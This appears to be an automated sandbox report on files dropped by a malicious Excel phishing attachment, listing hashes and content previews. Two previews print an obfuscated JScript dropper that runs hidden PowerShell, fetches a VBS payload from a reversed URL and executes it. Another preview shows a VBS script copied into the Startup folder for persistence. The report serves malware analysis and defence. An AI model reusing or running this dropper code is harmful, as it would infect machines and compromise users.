                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\~DF4FEF5585DDEBC2FF.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):3584
                Entropy (8bit):3.6516839114595685
                Encrypted:false
                SSDEEP:24:rM8gFb08aVNZwAIqDaZy5XAWCsgFMgGNbPKC4LGusNAKVr60RoboYmj:r3gFb2NZwgW2XAQgW5Nbvu0Ag6
                MD5:88FE8D48C045AE5948E97135E0079BA0
                SHA1:3DCDBED01BF9D0A1BAE73AE07238EFCDEE621F46
                SHA-256:ACF7463D122A4C63CBF6BD3E699CE41A3C8EBDB7EDEE2CD5C706712FEBFFA02E
                SHA-512:25B65893FCEE212C8F64DEA3F1CBF9409298D4C4867E01A50EA8100EE633F95633BBB1D2755CD8E201E4B5DBA4A64E0B571A67DD7A516B51FA275CCAD56DEB7E
                Malicious:false
                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\~DF6E0FF2D8D86EA3D4.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\~DF837617B7CBBF1532.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):3584
                Entropy (8bit):3.649122502410325
                Encrypted:false
                SSDEEP:24:rygFb08aVNZwAIqDaZy5XAWCsgFMgGNbPKC4LGusNAKVr60RoboYmj:rygFb2NZwgW2XAQgW5Nbvu0Ag6
                MD5:F7B221F69C58749DA0C319314CBC907E
                SHA1:139D0A58629389BA92D1AA0941C45D27C5A94D9D
                SHA-256:C6101119CE5F567036F858993520BEADEA45B9A782B0F9F5000EDB298CEFE1CE
                SHA-512:BFF8DC4054DD19E5E769270C1FC5D00EDF5B58C29B43DA3F979472EACE4011A5995A6275380CFF097B82F992C56B5DE8A5692F48A35023F660F3DC91B466CD8C
                Malicious:false
                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\~DF946FBCF6F1FE2AEE.TMP

                Download File
                Process:C:\Program Files\Internet Explorer\iexplore.exe
                File Type:data
                Category:dropped
                Size (bytes):16384
                Entropy (8bit):0.08856410781839605
                Encrypted:false
                SSDEEP:6:aMfllGlvalyPSstolkxMBo+u1kU9D89j1:tNlaat5b6yU9D8L
                MD5:D610B7C76F7E9400090680BFE35ECEB6
                SHA1:1990DF9BF0B8B349556CC1BF1BADA5552291D574
                SHA-256:B13149C08DD9924A14A1DC2F8C7246664412E624976571D276164D48109CC54E
                SHA-512:47659A375FE19F8CCF3C3501617774D8AFECC73C7B3274ADC235CFB261C207283D1EFFFE7EF2CE1B946A6D61A63C0127681BDDA7F00DC523E2A10FE7A75243FB
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\~DF9B400455113A3652.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eng Moha, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Thu Aug 25 14:19:58 2022, Security: 0
                Category:dropped
                Size (bytes):122880
                Entropy (8bit):6.685800930904397
                Encrypted:false
                SSDEEP:3072:Zk3hOdsylKlgxopeiBNhZFGzE+cL2kdAHzqwa+A3nMS7+9Ns7SsK8:Zk3hOdsylKlgxopeiBNhZF+E+W2kdAWK
                MD5:50F5874C831B0C98689DE3CE456959B5
                SHA1:1FAD0135423648C3D8D6A4AD92E2686DD3050D88
                SHA-256:AD14E51FFC63523F619ED9A38A386A1999446F32F7052FAC49358F23A8656B00
                SHA-512:1D20A60B07E3BD09EF5A731CAFE998BD5F3B306A47021B9EA5FAF3B1C1847DE6FBEB292D99CB1536BAC8F8E6A72DB0366640AA6ECE96B32240CEB4C27072B041
                Malicious:false
                Preview:......................>.......................................................g........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...h.......i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                C:\Users\user\AppData\Local\Temp\~DFBDDDF320306ACADA.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):28672
                Entropy (8bit):2.961262815451197
                Encrypted:false
                SSDEEP:768:Nfk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJ7e:xk3hOdsylKlgxopeiBNhZFGzE+cL2kd9
                MD5:2158F3BB9A3FAD15ED5A91F4FD26F031
                SHA1:A3C7BE23CC3299FDE6986EAAC440C8756B66220A
                SHA-256:4AAFB3F590AA713E69C35E6BC8EF7FD7900D5C4BB6ECBEE7E7E8A633A49A3515
                SHA-512:CFFD71B316E91EA6E60B0640CD54B71282F958663B0FD60C66C0C4D2B1E2D29282CC7F8620D9F15BA5E9801B3D819EC5EDAA325D5FD9A567B799536D2AC1BDF1
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8016
                Entropy (8bit):3.5845126493336563
                Encrypted:false
                SSDEEP:96:chQCNAPXMqJqvsqvJCwo+z8hQCNAPXMqJqvsEHyqvJCwor4z/JYCHB01ellUVMjp:cofco+z8ofoHnor4z/r01exjp
                MD5:C36E98F5C60ED7F38034FF2CD258200D
                SHA1:93ABB6DBC41A09D9E52D3F745F93949087171F6F
                SHA-256:6360109CBC04D9C070DAC8476640FD0E4882F1AAB6C12562E95E8287CA3F55A7
                SHA-512:1B9D940156B478D7BAAF98D6EF8BDB26FF01223E76C687240A1FB39CF3B1FCA046E499443F1D646924703EFF56885CA4F1C61CD1FEAAA788FD0971BA7DB42D47
                Malicious:false
                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4ad00c.TMP (copy)

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8016
                Entropy (8bit):3.5845126493336563
                Encrypted:false
                SSDEEP:96:chQCNAPXMqJqvsqvJCwo+z8hQCNAPXMqJqvsEHyqvJCwor4z/JYCHB01ellUVMjp:cofco+z8ofoHnor4z/r01exjp
                MD5:C36E98F5C60ED7F38034FF2CD258200D
                SHA1:93ABB6DBC41A09D9E52D3F745F93949087171F6F
                SHA-256:6360109CBC04D9C070DAC8476640FD0E4882F1AAB6C12562E95E8287CA3F55A7
                SHA-512:1B9D940156B478D7BAAF98D6EF8BDB26FF01223E76C687240A1FB39CF3B1FCA046E499443F1D646924703EFF56885CA4F1C61CD1FEAAA788FD0971BA7DB42D47
                Malicious:false
                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4ad2f9.TMP (copy)

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8016
                Entropy (8bit):3.5845126493336563
                Encrypted:false
                SSDEEP:96:chQCNAPXMqJqvsqvJCwo+z8hQCNAPXMqJqvsEHyqvJCwor4z/JYCHB01ellUVMjp:cofco+z8ofoHnor4z/r01exjp
                MD5:C36E98F5C60ED7F38034FF2CD258200D
                SHA1:93ABB6DBC41A09D9E52D3F745F93949087171F6F
                SHA-256:6360109CBC04D9C070DAC8476640FD0E4882F1AAB6C12562E95E8287CA3F55A7
                SHA-512:1B9D940156B478D7BAAF98D6EF8BDB26FF01223E76C687240A1FB39CF3B1FCA046E499443F1D646924703EFF56885CA4F1C61CD1FEAAA788FD0971BA7DB42D47
                Malicious:false
                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4aecfe.TMP (copy)

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8016
                Entropy (8bit):3.5845126493336563
                Encrypted:false
                SSDEEP:96:chQCNAPXMqJqvsqvJCwo+z8hQCNAPXMqJqvsEHyqvJCwor4z/JYCHB01ellUVMjp:cofco+z8ofoHnor4z/r01exjp
                MD5:C36E98F5C60ED7F38034FF2CD258200D
                SHA1:93ABB6DBC41A09D9E52D3F745F93949087171F6F
                SHA-256:6360109CBC04D9C070DAC8476640FD0E4882F1AAB6C12562E95E8287CA3F55A7
                SHA-512:1B9D940156B478D7BAAF98D6EF8BDB26FF01223E76C687240A1FB39CF3B1FCA046E499443F1D646924703EFF56885CA4F1C61CD1FEAAA788FD0971BA7DB42D47
                Malicious:false
                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7P5NJP61F4KQGXU99C4B.temp

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8016
                Entropy (8bit):3.5845126493336563
                Encrypted:false
                SSDEEP:96:chQCNAPXMqJqvsqvJCwo+z8hQCNAPXMqJqvsEHyqvJCwor4z/JYCHB01ellUVMjp:cofco+z8ofoHnor4z/r01exjp
                MD5:C36E98F5C60ED7F38034FF2CD258200D
                SHA1:93ABB6DBC41A09D9E52D3F745F93949087171F6F
                SHA-256:6360109CBC04D9C070DAC8476640FD0E4882F1AAB6C12562E95E8287CA3F55A7
                SHA-512:1B9D940156B478D7BAAF98D6EF8BDB26FF01223E76C687240A1FB39CF3B1FCA046E499443F1D646924703EFF56885CA4F1C61CD1FEAAA788FD0971BA7DB42D47
                Malicious:false
                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L139882CW8DOEJJPQYUW.temp

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8016
                Entropy (8bit):3.5845126493336563
                Encrypted:false
                SSDEEP:96:chQCNAPXMqJqvsqvJCwo+z8hQCNAPXMqJqvsEHyqvJCwor4z/JYCHB01ellUVMjp:cofco+z8ofoHnor4z/r01exjp
                MD5:C36E98F5C60ED7F38034FF2CD258200D
                SHA1:93ABB6DBC41A09D9E52D3F745F93949087171F6F
                SHA-256:6360109CBC04D9C070DAC8476640FD0E4882F1AAB6C12562E95E8287CA3F55A7
                SHA-512:1B9D940156B478D7BAAF98D6EF8BDB26FF01223E76C687240A1FB39CF3B1FCA046E499443F1D646924703EFF56885CA4F1C61CD1FEAAA788FD0971BA7DB42D47
                Malicious:false
                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SZV3PKGNB4TBZKOKCO78.temp

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8016
                Entropy (8bit):3.5845126493336563
                Encrypted:false
                SSDEEP:96:chQCNAPXMqJqvsqvJCwo+z8hQCNAPXMqJqvsEHyqvJCwor4z/JYCHB01ellUVMjp:cofco+z8ofoHnor4z/r01exjp
                MD5:C36E98F5C60ED7F38034FF2CD258200D
                SHA1:93ABB6DBC41A09D9E52D3F745F93949087171F6F
                SHA-256:6360109CBC04D9C070DAC8476640FD0E4882F1AAB6C12562E95E8287CA3F55A7
                SHA-512:1B9D940156B478D7BAAF98D6EF8BDB26FF01223E76C687240A1FB39CF3B1FCA046E499443F1D646924703EFF56885CA4F1C61CD1FEAAA788FD0971BA7DB42D47
                Malicious:false
                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U91LRAO81VP9WY5TTU8M.temp

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8016
                Entropy (8bit):3.5845126493336563
                Encrypted:false
                SSDEEP:96:chQCNAPXMqJqvsqvJCwo+z8hQCNAPXMqJqvsEHyqvJCwor4z/JYCHB01ellUVMjp:cofco+z8ofoHnor4z/r01exjp
                MD5:C36E98F5C60ED7F38034FF2CD258200D
                SHA1:93ABB6DBC41A09D9E52D3F745F93949087171F6F
                SHA-256:6360109CBC04D9C070DAC8476640FD0E4882F1AAB6C12562E95E8287CA3F55A7
                SHA-512:1B9D940156B478D7BAAF98D6EF8BDB26FF01223E76C687240A1FB39CF3B1FCA046E499443F1D646924703EFF56885CA4F1C61CD1FEAAA788FD0971BA7DB42D47
                Malicious:false
                Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs (copy)

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2496
                Entropy (8bit):5.597323322816649
                Encrypted:false
                SSDEEP:48:FHzvuAKlMzIZ4hocLiFAU/cCdh4lMY5J9le13Y0qIe/Iznp:FHSAKlM8ZpcWFAW76lMWcC0qIsIznp
                MD5:7092568E9CF03F175C5602BF89E19FB8
                SHA1:8EB83AD1D62BCF98242BDBE1B69BA43C5F289570
                SHA-256:BEEA2E6F3382520530CB34B3870AB0C43D8C2F8A03156EA1B76FECCA78DCFC1D
                SHA-512:93A4B71B3CEA876FF90D53F9D96CBB3E5683401D50116156F16B4320ADF23970445FE9260817D9B0B23D46935E22C7C1536B6EE672E49075F170415DF5CE8532
                Malicious:false
                Preview:....FwLRtmpy=WGJH()........Private Function KdyH(str)..HknBVqN = ""..TTRZ="Mi" + "d(st" + "r,i,1)"..For i=2-1 to Eval(elfjje()).. char = Eval(TTRZ).. if(char<>" ") then.. HknBVqN = HknBVqN+Mid(str,i,1).. End if..Next..KdyH = HknBVqN..End Function ....Private Function WrJQi(g0fdg44)......Execute(VFAs())......End Function....Jfpnga = Eval(pibL())..afs = Split(Jfpnga,"\")..LWtRVP=Eval(rleVRmM(KdyH("57 53 6 3 72 697 074 2e5 363 72 697 07 44e 616 d65")))......UDWk="C:\Users\" + afs(2) + rleVRmM(KdyH("5c 41 7 07 0446 1746 15c 526f 616 d 696 e6 75 c4 d6 96 3726 f736 f6 674 5c 576 96e 646 f7 77 35 c537 4617 27 4204 d65 6e75 5c 507 26f6 7726 16d73 5c537 4617274 757 05c"))........if Jfpnga = UDWk Then....WrJQi(FwLRtmpy)....Else....WrJQi(FwLRtmpy)....WrJQi("Move-item '" + Jfpnga + LWtRVP + "' -Destination '" + UDWk + LWtRVP + "'")....End if ........Private Function WGJH()..FruYYoB=rleVRmM(GRCX())....On Error Resume Next....Set LmTHr = GetObject(KdyH("N e w:0 002 DF01-00 00-00 00-C000-

                C:\Users\user\AppData\Roaming\sfoWQ.js (copy)

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):770
                Entropy (8bit):5.626218682122521
                Encrypted:false
                SSDEEP:24:cAIqDaZy5XAWCsgFMgGNbPKC4LGusNAKVrN:cgW2XAQgW5Nbvu0AgN
                MD5:D0AE486EEF636DEEDDFDA9366B5A7D7A
                SHA1:6CC3331D7E8AB3FDEDFCBEBF091EC6A24935B884
                SHA-256:740964B8F21B920E29D0EC54938ED220DEC6BCD150EE98DB88F3F8954969A54C
                SHA-512:89527995165B71768729B0607905D18CDB466C10BCCD924118F7021543107ACF5F6D03A7A0D57AAB27CE03167F12F1E6D1E311407F004A47F5FB15B117EB47FC
                Malicious:false
                Preview:var r = GetObject(emrkdsf())....var y7er00gg="Po"+ "wer" + "sh" + "ell";..var yy=r.ShellExecute(y7er00gg,wmkdflllw(),"","",0);..function emrkdsf()..{.....return "ne" + "w:137096" + "20-C279-11C" + "E-A49E-444" + "55354" + "0000"..}..function wmkdflllw()..{....return " $Erro" + "rActi" + "onPref" + "erence = 'Sile" + "ntlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\\qwe.vbs');" + "remove-item ($env:appdata + '\\sfoWQ.js')";..}..

                C:\Users\user\AppData\Roaming\sfoWQ.txt

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):770
                Entropy (8bit):5.626218682122521
                Encrypted:false
                SSDEEP:24:cAIqDaZy5XAWCsgFMgGNbPKC4LGusNAKVrN:cgW2XAQgW5Nbvu0AgN
                MD5:D0AE486EEF636DEEDDFDA9366B5A7D7A
                SHA1:6CC3331D7E8AB3FDEDFCBEBF091EC6A24935B884
                SHA-256:740964B8F21B920E29D0EC54938ED220DEC6BCD150EE98DB88F3F8954969A54C
                SHA-512:89527995165B71768729B0607905D18CDB466C10BCCD924118F7021543107ACF5F6D03A7A0D57AAB27CE03167F12F1E6D1E311407F004A47F5FB15B117EB47FC
                Malicious:false
                Preview:var r = GetObject(emrkdsf())....var y7er00gg="Po"+ "wer" + "sh" + "ell";..var yy=r.ShellExecute(y7er00gg,wmkdflllw(),"","",0);..function emrkdsf()..{.....return "ne" + "w:137096" + "20-C279-11C" + "E-A49E-444" + "55354" + "0000"..}..function wmkdflllw()..{....return " $Erro" + "rActi" + "onPref" + "erence = 'Sile" + "ntlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\\qwe.vbs');" + "remove-item ($env:appdata + '\\sfoWQ.js')";..}..

                C:\Users\user\Desktop\ACH Remittance Advice_CITI25822.xls

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Eng Moha, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Thu Aug 25 14:19:58 2022, Security: 0
                Category:dropped
                Size (bytes):122880
                Entropy (8bit):6.685796511585403
                Encrypted:false
                SSDEEP:3072:5k3hOdsylKlgxopeiBNhZFGzE+cL2kdAHzqwa+A3nMS7+9Ns7SsK8:5k3hOdsylKlgxopeiBNhZF+E+W2kdAWK
                MD5:A7CAEDC763C5BB36218E1A3A4725A5B8
